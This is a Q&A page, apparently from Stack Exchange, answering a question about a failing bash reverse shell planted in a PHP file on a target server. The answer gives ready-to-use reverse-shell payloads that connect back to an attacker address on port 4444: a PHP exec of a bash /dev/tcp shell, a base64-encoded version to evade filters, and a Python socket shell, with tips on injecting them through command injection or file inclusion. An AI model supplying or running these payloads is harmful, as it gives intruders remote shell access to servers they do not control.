bash反向shell报‘无作业控制’及命令未找到,如何获取有效反向shell?
Let’s walk through what’s happening with your reverse shell and how to fix it:
1. Understanding the "bash: no job control in this shell" Warning
This is a non-fatal warning, not an error that breaks your shell. Here’s why it happens:
- When you spawn a reverse shell with
bash -i, it runs as a non-interactive, non-login shell by default. Job control features (like usingCtrl+Zto background processes, orfg/bgto manage jobs) require an interactive terminal session, which your initial reverse shell doesn’t have configured. - The shell is still functional—you can run commands, navigate directories, etc.—you just won’t have job control tools until you adjust the terminal settings.
2. Fixing the "alldocs.php: line 1: *Everyones: command not found" Error
This is the critical issue blocking a proper shell. Here’s the root cause:
- Your bash reverse shell payload is being executed in a way that makes bash read the contents of
alldocs.phpas commands. Instead of running only your payload, bash is trying to execute the first line of the PHP file (*Everyones...) as a system command, which obviously doesn’t exist. - This usually happens if you’re inserting the raw bash payload directly into the PHP file (instead of using a PHP execution function to trigger the bash command) or misusing a file inclusion vulnerability. For example, if you’re including
alldocs.phpvia PHP, but the file contains raw bash code instead of PHP that executes the payload.
How to Get a Working Reverse Shell
Follow these steps to resolve the issues and spawn a stable, interactive shell:
Step 1: Execute the Payload Correctly via PHP
Ensure your bash payload is run through a PHP system execution function. For example, add this line to alldocs.php (or inject it via a vulnerability like command injection or file inclusion):
<?php exec("bash -i >& /dev/tcp/xx.xx.x.xx/4444 0>&1"); ?>
If special characters are being filtered by the target, encode the bash payload in base64 to avoid parsing problems:
- Encode your payload on your attack machine:
echo -n 'bash -i >& /dev/tcp/xx.xx.x.xx/4444 0>&1' | base64 - Use the encoded string in PHP:
<?php exec("echo '<YOUR_BASE64_STRING>' | base64 -d | bash"); ?>
Step 2: Fix Job Control & Enable Interactive Mode
Once your nc listener gets a connection, run this command to fix the terminal and enable job control:
stty raw -echo; fg
This sets your terminal to raw mode (so Ctrl+C works properly) and brings the reverse shell to the foreground, giving you a fully interactive session with job control features.
Alternative: Use a More Stable Reverse Shell Payload
If bash is causing persistent issues, try a Python-based payload (most Linux systems have Python preinstalled):
<?php exec("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"xx.xx.x.xx\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"); ?>
内容的提问来源于stack exchange,提问作者John

